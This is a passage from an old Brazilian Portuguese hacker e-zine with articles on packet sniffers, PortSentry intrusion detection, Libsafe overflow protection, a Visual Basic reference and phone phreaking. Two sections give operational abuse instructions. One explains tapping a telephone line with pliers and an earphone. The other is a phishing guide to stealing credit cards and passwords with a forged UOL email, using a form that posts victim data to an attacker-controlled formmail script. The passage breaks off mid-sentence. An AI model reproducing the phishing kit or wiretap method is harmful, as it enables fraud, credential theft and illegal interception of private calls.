*Obs: O Traduz Tudo 1.2 Pro Avaliao veio num CD que eu 
ganhei numa feira que eu fui com dois manos (o SyncMaster
e o The_GuardianAngel). Ah!! O CD eh um do Terra, um que
tem a capa +/- assim:

.------------------------------.
|                  Grtis      |
|                 720          |
|                   horas      |
|                              |
|       Descubra a             |
|            melhor maneira    |
|    de navegar na Web.        |
|                              |
| terra ([])                   |
| www.terra.com.br             |
`------------------------------'

Alguem tem ele aih???:) 

End of Text
   (EOT)


==========================================
Leia abaixo agora um texto sobre Sniffers!
==========================================
                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [07]
==[ Mais sobre Sniffers ]==
==[ por Ha0x-r00t       ]==

-----------------------------------
Sniffers e interpretacao eletronica
-----------------------------------

Bom pessoal esse e meu 1 texto aqui da zinesbr, tipo to muito 
emocionado(hehe) os motivos para que eu escrevesse para o zine
e que o Gotoxy tava desistindo de escrever, rolou ate uma conversa 
la no canal de que o zine ja era e tudo +. O foda e que o 
preguicoso do Kbytes so quer tocar punheta e domir o dia inteiro
nem ajuda com o zines, mas tudo bem, viadagens a parte e vamos para 
o que interessa:

Bom no meu primeiro texto vou falar sobre sniffers pois acho que o 
material sobre este assunto seja um pouco dificil de se encontar e
na maioria das vezes este e um poco confuso, vou tentar descrever 
de um jeito bem claro.

Frequentemente, as coisas naum sao o que parecem ser. Se formos das 
ouvidos a midia, o pior destino que um administrador de sistema pode 
sofrer e seu servidor da Web sofrer invasao de script-kiddies e sua 
pagina ser alterada. Isso naum e verdade. De fato, embora esses ataques 
frontais parecam dramaticos e frquentemente resultem em manchetes na 
midia, eles naum sao nada comparados com um ataque real. Os crackers 
reais geralmente naum anunciam sus presenca nem ostentam suas realizacoes. 
Em vez disso, eles instalam dispositivos de monitoracao sub-repticios que 
furtivamente coletam informacoes sobre sua rede. -> e ai que entra o bom
e velho sniffer

1.1- Como os sniffers trabalham

Por padrao, as estacoes de trabalho (mesmo aquelas alojadas na amesma rede) 
ouvem e respondem somente a pacotes endrecados para elas.Entretanto, e 
possivel criar um software que coloca a interface de rede em modo promiscuo.
Nessa condicao a estacao de trabalho pode monitorar e capturar todo o trafego
de rede e pacotes que a atravessam, independente do destino legitimo que ele 
possam ter.

Para enterdermos como os programadores como nos fazem isto, voce deve 
examinar os arquivos de cabecalho dos programas de sniffer. Geramente 
esses programas sao escritos em C, embora Perl seja tb adequado, veja 
o cabecalho de um sniffer padrao:

#include <linux/if.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/socket.h>
#include <linux/tcp.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>

A maioria dos sniffers sao projetados com esses blocos de construcao. Cada um 
trata um aspecto diferente dos processos ouvir, registrar e informar trafego 
de TCP/IP. Entretanto, os hackers colocam a interface de rede no modo 
prosmicuo utilizando um flag de if.h que se parece com isto:

#define IFF_PROMISC    0x100         /* receive all packets */

Para a deteccao de um programa em modo promiscuo e so procurar por uma 
linha como a acima.

Uma vez que a interface esta no modo promiscuo e portanto esta ouvindo
todos os pacotes na rede, o que resta e ouvir o trafego de TCP/IP e 
formata-lo na forma ligivel por humano na saida-padrao ou gravando-o em 
um arquivo.

O modo promiscuo naum e necessario pois certamente voce podera escrever uma 
ferramenta que ouvira todos os pacotes no host local sem lancar a interface 
no modo promiscuo(o que torna mais dificil a deteccao do sniffer), mas para 
capturar todo o trafego no segmento de rede, o modo promiscuo e obrigatorio.

Alguns sniffers interessante, naum pus eles na zine devido ja ao grande 
volume do texto, mas dou para vcs onde acha-los.

linsniffer(linux)-> para quem necessita de uma saida menos detalhada <-
vc pode achalo hein http://agape.trilidun.org/hack/network-sniffers/linsnifferc
ou tb em http://packetstorm.securify.com e procure por linsniffer.c

hunt(linux)-> este e o meu preferido<- hunt e outra escolha que e adequada 
quando vc precisa de menso saida bruta e mais facil de ler. vc pode encontralo 
hein http://www.cri.cz/kra/index.html ou em http://packetstorm.securify.com 
e procure por hunt

Bom por aqui e so pessol tomara que o gotoxy goste do meu txt e ponha ele na 
zine e que outras vezes eu possa voltar a escrever para vcs.

valeu
fui


=======================================
Leia abaixo agora um texto sobre Mysql!
=======================================

                                                     Ha0x-r00t
                                                     ha0x@zipmail.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [08]
==[ Tutorial do Portsentry ]==
==[ por TankDS             ]==

####################################
# Tutorial Bsico Sobre PortSentry #
####################################

1 - Introduo

O que  o PortSentry? O PortSentry  um programa que analisa suas conexes 
TCP e UDP. O PortSentry  uma ferramente de IDS (Intrusion Detection System), 
que podemos evitar um portscanner, devolvendo ao atacante informaes falsas, 
sobre servios que estejam rodando. Dependendo das regras que so definidas 
a porta no responder ao "visitante", mas sim normalmente para outros 
usurios. Estarei mostrando neste tutorial quais as opes para sua 
configurao. Cabe a voc escolher a mais correta dependendo da poltica de 
segurana da sua rede. 


2 - Instalao

 aconselhvel que a utilizao do PortSentry seja feita junto ao IPchains e 
tcp_wrappers, para que ele funcione adequadamente. Para comearmos o nosso 
processo de instalao, baixe o PortSentry no seguinte endereo:

http://www.psionic.com/tools/portsentry-1.0.tar.gz

Depois de ter baixado o programa, descompacte ele. este criar um diretrio 
chamado: "portsentry-1.0".


3 - Configurao

A configurao do PortSentry resume-se basicamente em dois arquivos o
portsentry.conf e portsentry.ignore. Onde no primeiro  onde ns decidiremos 
as regras e no segundo onde podemos definir os IP's que no ser aplicada as 
regras. Vamos ento definir as regras no portsentry.conf, para isso use um 
editor de texto da sua preferncia.


3.1 - Port Configurations

Nesta parte definiremos quais portas o PortSentry ter sobre seus cuidados. 
Como voc pode observar ele nos oferece 3 modos de analise, bsico, 
intermedirio e avanado. Mas voc pode tambm definir ou retirar portas,
veja abaixo:


#TCP_PORTS="1,7,9,11,15,70,79,80,109,110,111,119,138,
139,143,512,513,514,515,540,635,1080,1524,2000,2001,
4000,4001,5742,6000,6001,6667,12345,12346,20034,30303,
32771,32772,32773,32774,31337,40421,40425,49724,54320"
#UDP_PORTS="1,7,9,66,67,68,69,111,137,138,161,162,474,
513,517,518,635,640,641,666,700,2049, 32770,32771,32772,
32773,32774,31337,54321"

#TCP_PORTS="1,11,15,79,111,119,143,540,635,1080,1524,
2000,5742,6667,12345,12346,20034,31337, 32771,32772,
32773,32774,40421,49724,54320"
UDP_PORTS="1,7,9,69,161,162,513,635,640,641,700,32770,
32771,32772,32773,32774,31337,54321"

#TCP_PORTS="1,11,15,110,111,143,540,635,1080,524,2000,
12345,12346,20034,32771,32772,32773,32774, 49724,54320"
#UDP_PORTS="1,7,9,69,161,162,513,640,700,32770,32771,
32772,32773,32774,31337,54321"


Aps voc ter definido qual opo usar, retire o comentrio (#), no inicio 
da linha.


3.2 - Advanced Stealth Scan Detection Options

Nesta parte definiremos as portas que o PortSentry vai verificar. A 
configurao padro  1023, para TCP e UDP. No  recomendado a alterao 
desta linha, caso voc seja iniciante, isso poder lhe causar falsos alarmes. 
As linhas so as seguintes:

ADVANCED_PORTS_TCP="1023"
ADVANCED_PORTS_UDP="1023"

Agora voc dever "dizer" ao PortSentry quais portas estaro excludas da 
verificao, a linha segue abaixo:

ADVANCED_EXCLUDE_TCP="113,139"
ADVANCED_EXCLUDE_UDP="520,138,137,67"

No nosso caso estaramos retirando da verificao as portas TCP=113,139 e 
UDP=520,138,137,67. Voc por alterar isto perfeitamente conforme sua poltica 
de segurana.


3.3 - Configuration Files

Aqui o PortSentry define onde estaro os arquivos de configurao.

O primeiro  o portsentry.ignore, no qual onde ficaro s IP's que no sero 
bloqueados: IGNORE_FILE="/usr/local/psionic/portsentry/portsentry.ignore"

Este  onde ficar o histrico do programa:
HISTORY_FILE="/usr/local/psionic/portsentry/portsentry.history"

E este por final  onde ficar os IP's ou Hosts bloqueados pelo PortSentry:
BLOCKED_FILE="/usr/local/psionic/portsentry/portsentry.blocked"


3.4 - Response Options

Nesta parte definiremos um tarefa para uma tentativa de ataque ou invaso da 
sua rede. As opes so:

0 = Do not block UDP/TCP scans.
1 = Block UDP/TCP scans.
2 = Run external command only (KILL_RUN_CMD)

BLOCK_UDP="1"
BLOCK_TCP="1"

Por configurao padro o PortSentry vem com a opo 1 habilitada, que no caso 
bloqueia scans nas portas TCP/UDP. A opo 2, seria um "contra-ataque" ou um
script feito por voc para lhe enviar um aviso, caso soe o alarme que ser 
executado pelo PortSentry, e a opo 0 no bloqueia e tambm no executa 
ataques. (ser que algum usaria esta?).


3.5 - Dropping Routes

Aqui iremos definir como o PortSentry ir tratar uma possvel invaso, como 
estaremos trabalhando o PortSentry junto ao IPchains, faremos que o PortSentry 
coloque o IP do invasor em DENY, a partir dai o Linux passar a ignorar 
qualquer requisio vinda deste IP. Voc dever retirar o comentrio da 
seguinte linha:

# New ipchain support for Linux kernel version 2.102+
#KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"

ficando assim:

# New ipchain support for Linux kernel version 2.102+
KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"

isto ir barrar qualquer requisio INPUT vinda do endereo IP do possvel
atacante, gerando tambm um log em /var/log/messages.


3.6 - TCP Wrappers

Caso voc tenha o tcp_wrappers instalado, nesta linha, voc poder "dizer" ao
PortSentry para colocar o IP do invasor em /etc/hosts.deny. A linha vem 
desabilitada por padro, veja abaixo:

KILL_HOSTS_DENY="ALL: $TARGET$"

caso voc no queira utilizar esta opo apenas comente esta linha colocando 
o # no inicio.


3.7 - External Command

Lembra-se na seo 3.4 que falamos de um "contra-ataque" ou um sript feito por 
voc, que pode ser executado pelo PortSentry? Ento  aqui que iremos definir 
como ser feito o "contra-ataque" ou executar um sript. veja a linha abaixo:

#KILL_RUN_CMD="/some/path/here/script $TARGET$ $PORT$"

Por padro ela vem comentada. caso voc queira fazer o contra-ataque ou roda 
um script, voc deve substituir o "/some/path/here/script", pelo arquivo que 
o PortSentry rodar. Na parte "$TARGET$"ser o IP do invasor e na $PORT$ ser 
a porta que voc atacar o invasor, que ser por padro a mesma porta que ele 
tentou lhe invadir.


3.8 - Scan trigger value

Aqui voc decidir aps quantas tentativas o PortSentry ir ter uma reao, 
por padro  0, mas a opo 1 e 2 reduz falsos alarmes. A linha segue abaixo:

SCAN_TRIGGER="0"


3.9 - Port Banner Section

Estamos chegando ao fim deste tutorial de configurao do PortSentry, Nesta 
nossa ltima opo. poderemos definir um banner que ser enviado ao convidado 
no esperado. a linha segue-se abaixo, podendo ser alterada:

#PORT_BANNER="** UNAUTHORIZED ACCESS PROHIBITED *** YOUR CONNECTION ATTEMPT
HAS BEEN LOGGED. GO AWAY."

para ativar esta linha basta retirar o comentrio no inicio da linha.

4 - Rodando o PortSentry

Depois de terminar a sua configurao, salve o arquivo com o mesmo nome, ou 
se voc preferir pode fazer um backup do arquivo original, no se esquea o 
PortSentry procura suas configuraes no portsentry.conf. Para podermos rodar 
o PortSentry v em: "/usr/local/psionic/portsentry", por padro  este o 
diretrio da instalao. em seguida rode:

#./portsentry -tcp
#./portsentry -udp


OBS: No se esquea do (./) antes do comando.


Os comandos que utilizamos "./portsentry -tcp e ./portsentry -udp", deixar ele 
verificando qualquer trfego suspeito nas portas TCP e UDP. Alm destas temos 
tambm as opes " - atcp e -audp" (Advanced), que no so recomendadas por 
gerar falsos alarmes. Depois de roda-lo voc pode verificar com o comando no 
linux 'ps aux', e voc ver se ele est rodando, Mas para termos certeza que o 
nosso Portsentry est configurado corretamente, execute um teste:

#telnet seu_ip 1080

Caso funcione aparecer o banner que voc definiu na seo 3.9 e a conexo ser 
encerrada, e alm disso caso voc esteja utilizando o tcp_wrappers o IP do 
atacante ser colocado no /etc/hosts.deny e uma linha semelhante ser includa 
no portsentry.bloqued.tcp no diretrio /urs/local/psionic/portsentry-1.0. A 
diferena  que no portsentry.bloqued.tcp, ser adicionado o hosts da
maquina invasora, o IP, a porta e ainda a data e hora da tentativa.


5 - Referencias

As referencias usadas neste tutorial foram retirados dos README.* existentes 
na compactao do PortSentry.


6 - Finalizando

Chegamos ao final de nosso tutorial sobre PortSentry, espero que eu possa ter 
passado para voc leitor um boa soluo para sua rede ou micro caseiro. 
Gostaria de deixar bem claro que todas as configuraes feitas aqui depender 
da poltica de segurana que voc ou sua empresa possui. 

At a prxima...


==============================================
Leia abaixo agora um texto sobre Visual Basic!
==============================================

                                                       TankDS
                                                       tankds@bol.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [09]
==[ Guia de Visual Basic ]==
==[ por Ha0x-r00t        ]==

------------
Visual Basic
------------

Aqui estou eu de novo, mais uma vez, again. escrevendo para a zine, desta 
vez queria mandaer um alo pro Daemon e pra galera de Minas(Sao Lourenco) 
e claro pro gotoxy, hehe tem q puxar o saco se naum ele naum poe meu txt 
na zine, puta eu pareco um viado escrevendo, vamos ao que interessa:


1-Guia de referencia rapida para Visual Basic

Comandos

Dim-> usado para criar variaveis. Uma variavel e um local da memoria 
onde e armazenado um valor.

Sintaxe : Dim (nome ou valor)  as (tipo da variavel)

If...Then...Else-> Comando associado a uma condicao. Se ela for verdadeira, 
execute o bloco de comando 1; se nao, execute o bloco de comandos 2

Sintaxe: If<<condicao>> Then <<comando1>>
         Else<<comando2>>

operadores usados para formar condicao: =, <>, <, >, <=, >=

If...Then...ElseIf-> Semelhante ao anterior, essa estrutura permite testar 
varias cndicoes em um unico bloco de IF e executar um comando a cada uma 
das situacoes

Sintaxe: IF<<condicao1>> Then <<comando1>>
         ElseIf<<condicao2>> Then <<comando2>>
         Else<<comando3>>
         End IF

Select Case-> Similar ao If..Then..Else, mas naum permite fazer o teste com 
variaveis numericas.

Sintaxe: Select Case<<variavel>>
         Case<<condicao1>>
         <<comando>
         Case <<condicao2>>
         <<comando2>>
         Case Else
         <<comando3>>
         End Select

Do While-> Permite executar os comandos enquanto a condicao especificada for 
verdadeira.

Sintaxe: DO While <<condicao>>
         <<comando>>
         Loop
         Do
         <<comando>>
         Loop While <<condicao>>

Do Until-> Permite executar um bloco de comandos ate que a condicao seja 
satisfeita.

Sintaxe: Do Until<<condicao>>
         <<comando>>
         Loop
         Do
         <<comando>>
         Loop While <<condicao>>

For next-> executar um bloco de comando por uma quantidade predefinida de 
vezes

Sintaxe: for variavel = 1 to n
         <<comando>>
         Next i

Go to-> permite desviar o fluxo de um bloco de comandos para outra parte de
programa.

Sintaxe: GoTo TrataErro
         Ou
         GoTo 5

Load-> utilizado para carregar formulario(form) na memoria.
Sintaxe: Load (Form)

Unload-> permite fechar o formulario(form) que estuver aberto.
Sintaxe: Unload(form)

Funcoes:

Chr-> retorna um caracter para o codigo ANSI informado.
Exemplo: Chr(13) = Enter

Format-> rotina que retorna um numero no formato que voce quiser(ooooooo).
Exemplo: Format(NOw, " dd-mm-yy" ), apresenta a data de hoje no formato 
especificado.

LCase-> retorna o caracter minusculo do caracter informado.
Exemplo : LCase("H"), retorna "h".

Left-> retorna os "n" caracteres mais a esquerda.
Exemplo: Left("Ha0x",3), retorna "Ha0".

Len-> retorna o tamanho de uma string.
Exemplo: Len("Ha0x-r00t"), retorna 9.

Ltrim-> retira espacos a esuqerda em uma string.

Mid-> retorna parte de uma string

Rtrim-> retira espacos a direita em uma string

Trim-> reita espacos a direita e a esquerda em uma string.

Ucase-> retorna o caracter maiusculo do caracter informado.
EXemplo: Ucase("l"), retorna "L".

Val-> converte uma string de digitos em um numero.

Ccur-> converte um dado do tipo caracter para tipo currency.

Cdbl-> converte um dado do tipo caracter para tipo double

Cint-> converte um dado do tipo caracter para tipo integer.

CLng-> converte um dado do tipo caracter para tipo long.

CSng-> converte um dado do tipo caracter para tipo single.

CStr-> converte um dado do tipo caracter para tipo string.

Str-> converte um valeo numerico para caracter.

Propriedades dos obejetos:

Caption-> propriedade que permite mostrar mensagens no programa.

Enabled-> habilita ou desabilita os obejtos. Se estiver em false, naum se 
tem acesso ao objeto.

Visible-> se esta prppriedade estiver configurada como false, o objeto 
ficara invisivel.

Font-> Esta propriedade permite que seja alterada a fonte de um objeto. 
Estara presente em objetos como textbox, label, command e botoes check e 
option.

Name-> permite alterar o nome do objeto

Height-> permite alterar a altura do objeto

Width-> permite alterar a largura do objeto

WindowSate-> permite definir o modo de visualizacao da janela do programa: 
normal, 
minimizado ou maximizado.

Descricao dos eventos

click-> Executa acoes especificadas pelo programador quando o usuario clica 
sobre algum objeto

dbclick-> executa acoes especificadas pelo programador quando o usuario clica 
duas vezes sobre algum objeto

resize-> executa comandos quando o usuario redimensiona o formulario(form)

load-> executa comandos no momento em que o formulario for carregado na memoria

gotfocus-> ocorre quando um objeto ganha foco, sem executar as sua funcoes 
em outros eventos.

lostfocus-> ocorre quando um objeto perde o foco.

keypress-> ocorre quando e pressionada alguma tecla.

mousemove-> sempre que mover o ponteiro do mouse algo sera ativado. Um exemplo 
pratico sao os protetores de tela, que sao desativados quando voce mexe o mouse

Objetos:

Pointer-> permite selecionar um controle que ja tenha sido colocado no 
formulario(form).

picturebox-> exibe imagens graficas no programa

label-> permite exibir textos estaticos no formulario(form)

textbox-> recebe qualquer tipo de entrada dedados no programa

frame-> agrupa diversos objetos em um mesmo local, separando-os dos demais 
controles existentes

CommandButton-> insere um botao de comando no formulario(form)

checkbox-> permite escolher uma ou mais opcoes dentro de um grupo. Esse
 objeto retorna um valor logico: true ou false. Significa que, clicando 
no checkbox, a propriedade Value do objeto retornara True; caso contrario,
ela retornara False

optionbutton-> exibe multiplas opcoes de escolha, send somente possivel 
selecionar uma delas.

comobox-> apresenta uma caixa com uma seta para que o usurio possa selecionar
algum item ou digitar algo que sera recebido atraves da propriedade text.

listbox-> semelhante ao Combobox, permite visualizar uma lista de itens para 
sua escolha

Hscrollbar-> insere uma barra de rolagem horizontal para que se possa navegar 
em uma lista

Scroollbar-> possibilita inserir uma barra de rolagem vertical para facilitar 
a navegacao

Timer-> executa uma acao em intervalos de tempo pre-estabelecidos

DriveListBox-> esse objeto exibe unidades de disco para que se possa selecionar
um deles.

DirListBox-> exibe diretorios e caminhos para que se possa selecionar um deles

FileListBox-> exibe uma lista de arquivos

shape-> permite desenhar uma variedade de formasno seu Form enquanto se cria 
a interface do programa

Line-> objeto usado para desenhar uma variedadede de estilos de linhas em 
seu Form.

Image-> exibe uma imagem de um arquivos bmp, icon, wmf, jpeg, gif e emf.

Data-> permote se conectar e navegar em um banco de dados.

Ole-> permite inserir objetos incorporados a aplicacoes como, por expemplo, 
o Microsoft Word.

Bom por aqui encerro meu gruia de VB, outra coisa, atencao programadores por 
favor preciso de um IDE de VB pra linux, por favor quem souber de algum 
e-mail me!
Programe a obejeto e naum a espaguete

ae gotoxy ve se arruma um e mail pra mim ai da zines
ha0x@zinesbr.com.br <- hehe

valeu pessoal!!!


===========================================
Leia abaixo agora um texto sobre Phreaking!
===========================================


                                                     Ha0x-r00t
                                                     ha0x@zipmail.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [10]
==[ Phreaking Parte I ]==
==[ por Backz         ]==

##########################
Fazendo uma Escuta Simples
########################## 

Existe um mtodo muito simples de se fazer escutas telefnicas.
Explicarei aqui o mtodo mais simples possvel. 

Vamos supor que voc esteja em uma sala, e ve no cantinho da parede
um fiuzinho passando. Vc vai la, olha, e percebe que o 'filzinho'  
de telefone. Legalz, do que iremos precisar?

* Um alicate
* Um fone de ouvido (daqueles pequenos que vem em radinho vagabundo)

1- Descasque apenas um pedacinho dos fios telefnicos cuidadosamente
com o alicate.

   No corte o fio, apenas tire um 'pedacinho' do plastico. Se for
daqueles fios do tipo americano ( daquele que vai pro modem, q tem um 
plug quadradinho), fique sabendo que dentro dele h 4 fios, e 2 deles 
no iremos ultilizar, o preto e o amarelo (externos).

Somente o "VERMELHO" e o "VERDE" serao ultilizados (os internos).

2- Coloque o fone nas oreba, e enrole as partes descascadas do fio do
telefone no pino de plug do fone como o exemplo mostra:

  ________	     _      ______________
  ________|---- /-\----|_____________    - fio telefonico
		    ***
		    |-|
		    ***  -- divisria colorida
		   |   |
   ________    |   |   ________________
   ________|---|---|--|______________	- fio telefonico
		   \___/


Simples. O Pino do fone tem 3 plugs. Encoste um em uma parte, e o
outro na outra, pronto? Ouviu o "Tannnn", certo! Agora espere algum
de sua casa usar o telefone, espere que ela encoste na linha e vc 
entra em ao.

Dica: Desencoste os fizinhos antes da pessoa colocar o fone do gancho.

3- Tentei o mesmo com um Microfone e funcionou, minha voz saia na
exteno.

   Quem sabe vc no construa um telefone? huhuhuh, mas  isso galera,
espero que tenham gostado.

 At a Prxima.


===========================================
Leia abaixo agora um texto sobre Seguranca!
===========================================

                                                 Backz
                                                 backzoverflow@yahoo.com
.:x| -------------------------------------------------------------------|x:.










SETOR [11]
==[ Security Parte I ]==
==[ por Gotoxy       ]==

#############
## t0pics  ##
#############

1. Introducao
2. Libsafe 2.0
   2.1 Instalacao
   2.2 Configuracao
   2.3 Como ele reage
3. Referencia
4. The End


1. Introducao 
=============

Neste texto vou estar falando de uma ferramenta que procura proteger
um sistema contra Buffer Overflows. Seu nome  Libsafe, e sua ultima
versao  a 2.0, e portanto, neste texto vou estar falando sobre essa
versao. 

Na versao 1.3 do Libsafe, ele protegia o sistema contra exploitacoes
de bufferoverflows no stack, e na versao 2.0, o Libsafe, alem de
proteger o sistema como protegia na versao 1.3, agora protege o
sistema contra exploits de format string.

Bem, tah aih o motivo pelo qual vou estar falando do Libsafe v2.0

2. Libsafe 2.0
==============

Como eu j disse, Libsafe eh uma ferramenta muito util na area de
segunca, sua funcao eh proteger uma makina contra ataques de Buffer
Overflows ( tais como: Stack Smashing e Format Strings ). O que ela 
faz eh interceptar todas as chamadas das funcoes() da bibliotecas que 
sao vulneraveis. As funcoes que a Libsafe monitora, seguem abaixo:

strcpy(char *dest, const char *src)
strcat(char *dest, const char *src)
getwd(char *buf)
gets(char *s)
[vf]scanf(const char *format, ...)
realpath(char *path, char resolved_path[])
[v]sprintf(char *str, const char *format, ...)

Se algum exploit tentar exploitar uma dessas funcoes, ele nao
tera exito! Mas caso o exploit exploitar qualquer outra funcao,
poder obter exito e consequentemente obter root.

Vamos ver agora como instalar essa ferramenta!!


2.1. Instalacao
=============== 

Para instalar eh muito facil! Primeiro, pegue o source no
site da packetstorm(http://packetstormsecurity.org). Baixe
a versao 2.0 do mesmo e depois disso basta instalar. A
primeira coisa a fazer eh descompactar o arkivo, para isso,
faca:

~# chmod 600 libsafe-2.0.tgz
~# tar zxvf libsafe-2.0.tgz

Ps:
Antes de descompactar, recomendo voce colocar boas permissoes 
apenas para o root.

Pronto, apos isso entre no diretorio criado, para isso, faca:

~# cd libsafe-2.0

Agora, digite make e make install na shell, para compilar a 
libsafe:

~# make; make install

Aguarde algum tempo... apos a compilacao, entre no diretorio
src e depois mova a lib libsafe.so.2.0 para o diretorio /lib:

~# cd src
~# mv libsafe.so.2.0 /lib

Estamos quase terminando a instalacao da Libsafe! Agora voce
deve setar a variavel environment LD_PRELOAD para apontar para
a lib libsafe.so.2.0:

~# export LD_PRELOAD=/lib/libsafe.so.2

Ok. Nossa libsafe ja esta instalada. Agora soh nos resta
configurar.


2.2. Configuracao
=================

Para configurar eh facil tambem! Antes de configura-la,
vamos fazer um teste! Entre no diretorio onde esta localizado
a libsafe e depois entre no diretorio exploits. Agora, copie
o executavel t1 para o diretorio de um user qualquer do seu
sistema:

~# cd libsafe-2.0/exploits
~# cp t1 /home/user

Apos isso, logue-se como 'user' na sua makina e rode este
exploit:

~$ ./t1
This program tries to use strcpy() to overflow the buffer.
If you get a /bin/sh prompt, then the exploit has worked.
Press any key to continue...
Detected an attempt to write across stack boundary.
Terminating /home/user/t1.
    uid=1001  euid=1001  pid=302
Call stack:
    0x400176c5
    0x400177b2
    0x80484fd
    0x4003d572
Overflow caused by strcpy()
~$

Realmente a Libsafe funcionou... mas suponhamos que o
invasor tire a variavel environment LD_PRELOAD do sistema:

~$ unset LD_PRELOAD

Retirada a variavel do sistema, o invasor tenta executar
novamente o exploit:

~$ ./t1
This program tries to use strcpy() to overflow the buffer.
If you get a /bin/sh prompt, then the exploit has worked.
Press any key to continue...
~$

Ele conseguiu executar o exploit com exito, mas nao obteve 
root, mas isso nao o impede de usar outro exploit mais 
eficiente e consenquentemente obter root. 

Demonstrei isso apenas para ensina-los que eh necessario
configurar a Libsafe corretamente, pois em sua instalacao
default, eh muito vulneravel.

Configuracao
------------

Primeiramente, entre no diretorio do users do seu sistema
e depois adicione a seguinte linha no arkivo .profile:

~# cd /home/user
~# echo "export LD_PRELOAD=/lib/libsafe.so.2" >> .profile

Agora, entre no diretorio /etc e adicione a seguinte linha
abaixo no arquivo ld.so.preload:

~# echo "/lib/libsafe.so.2" >> ld.so.preload

Pronto. A Libsafe ja esta configurada. Vamos fazer o teste
do exploit novamente. Logue-se novamente com o mesmo user
que voce logou e rode o exploit:

~$ ./t1
This program tries to use strcpy() to overflow the buffer.
If you get a /bin/sh prompt, then the exploit has worked.
Press any key to continue...
Detected an attempt to write across stack boundary.
Terminating /home/user/t1.
    uid=1001  euid=1001  pid=302
Call stack:
    0x400176c5
    0x400177b2
    0x80484fd
    0x4003d572
Overflow caused by strcpy()

~$ unset LD_PRELOAD
~$ ./t1
This program tries to use strcpy() to overflow the buffer.
If you get a /bin/sh prompt, then the exploit has worked.
Press any key to continue...
Detected an attempt to write across stack boundary.
Terminating /home/user/t1.
    uid=1001  euid=1001  pid=302
Call stack:
    0x400176c5
    0x400177b2
    0x80484fd
    0x4003d572
Overflow caused by strcpy()
~$

Como voce viu, essa tecnica de retirar a variavel envinroment
do sistema nao funciona mais! 


2.3. Como ele reage
===================

Apos o invasor executar tal exploit e caso nao possua 
exito, a Libsafe vai registrar essa tentativa no arkivo
de LOG /var/log/syslog. Mas antes de fazer isso, ele kila
o programa que tentou explorar o sistema (como no caso
o t1, que apos ser executado de forma mal-sucedida, ele
foi kilado). Veja:

~# cat /var/log/syslog
...
Mes  3 00:00:00 zinesbr libsafe.so[335]: Detected an attempt to write 
across stack boundary.
Mes  3 00:00:00 zinesbr libsafe.so[335]: Terminating /home/user/t1.
Mes  3 00:00:00 zinesbr libsafe.so[335]:     uid=1001  euid=1001  pid=335
Mes  3 0:00:00 zinesbr libsafe.so[335]: Call stack:
Mes  3 00:00:00 zinesbr libsafe.so[335]:     0x400176c5
Mes  3 00:00:00 zinesbr libsafe.so[335]:     0x400177b2
Mes  3 00:00:00 zinesbr libsafe.so[335]:     0x80484fd
Mes  3 00:00:00 zinesbr libsafe.so[335]:     0x4003d572
Mes  3 00:00:00 zinesbr libsafe.so[335]: Overflow caused by strcpy()

Isso foi registrado no arkivo /var/log/syslog! Apos a Libsafe detectar
a tentativa de tal programa tentar escrever no stack, ele eh terminado.
 

3. Referencia
=============

As referencias foram retiradas dos arquivos README's que vieram
junto ao Libsafe:

/libsafe-2.0/README e /libsafe-2.0/doc/libsafe.8.html


4. The End
==========

Termino por aqui. Mas antes de terminar, aviso: a Libsafe nao eh
tao segura quanto parece, portanto, recomendo a voce alem de usa-la,
usar outros programas que tem como objetivo proteger seu sistema!!
Falow.


===================================================
Leia abaixo agora um texto sobre Engenharia Social!
===================================================

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [12]
==[ Engenharia Social ]==
==[ por Backz         ]==

  Algums Mtodos aplicados  Engenharia Social
  - - - - - - - - - - - - - - - - - - - - - - 


00 - Introduo
01 - Adquirindo Cartes
02 - Adquirindo Senhas
03 - Alguns cuidados
04 - Fim 


00 - Introduo
^^^^^^^^^^^^^^^

Bom, todos ns sabemos o que  Engenharia Social neh? Pois
, conversando com alguns amigos vi que todos sabiam o que
era, mas no sabiam aplica-la na prtica. Ento pretendo
mostrar aqui algumas formas prticas aplicadas  Engenharia
Social. 



01 - Adquirindo Cartes de Crdito
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

A Engenharia Social pode ser muito bem aplicada quando o assunto  
Cartes de Crdito. Lembre-se: ES  prima do Hacking, ento vc pode 
juntar as tcnicas e seus conhecimentos para conseguir um CC (carto 
de crdito). Bom, aqui vai um exemplo de uma maneira simples de 
aplicao de ES.

 criado um formulrio da UOL, dizendo que ouve um erro em seus servidores
e pedindo urgentimente o recadastramento. S que naquele formulriozinho,
quando a pessoa clicar em "enviar" todos os dados sero enviados ao seu 
email. Bom, vc deve achar um SMTP bugado para realizar a operao.Configurar 
seu Nestcape Messager pra usar o smtp bugado e trocar a Identidade pela 
identidade da UOL. Se vc desconhece a arte de falsar emails procure mais 
sobre o assunto nos seguintes sites:

http://zinesbr.hpg.com.br/
http://unsekurity.virtualave.net/

 recomendavel usar um cliente como o Nescape Messemger, pois aceita
o envio de emails em HTML. Se voc possi SMTP no seu Linux  mais fcil
porm mais arriscado, veja bem para quem voc vai enviar.

Em anexo, segue o codigo em HTML (es/email.html) do formulario a ser enviado. 
VC precisar de um formmail.pl e de um email prprio para isso. Altere de 
acordo com suas idias.

Para utiliza-lo, basta ajustar o seguinte cdigo (que se encontra no
email.html):

<form name="cadform" action="http://SEUSITE.virtualave.net/formmail.pl" 
method="POST" onSubmit="return confereTudo();">
<input type="hidden" name="recipient" value="SEU@EMAIL.com">

e pronto, envie o email para vtima, se ela retornar com a mensagem, dever 
chegar um email com todos os dados preenchidos no formulrio. para inserir 
este cdigo no email, ultilize o editor em java que vem com o Netscape 
Messenger. No invente nada ainda antes de ler o resto do texto. 
 


02 - Adquirindo Senhas
^^^^^^^^^^^^^^^^^^^^^^

Suponhamos que a pessoa tenha enviado o formulrio todo certinho, mas com a 
senha alterada e o que voc mais quer  a "senha" para conexo. Ento vc 
tenta abrir o email com aquela senha e ve que no funciona: O que vc pode 
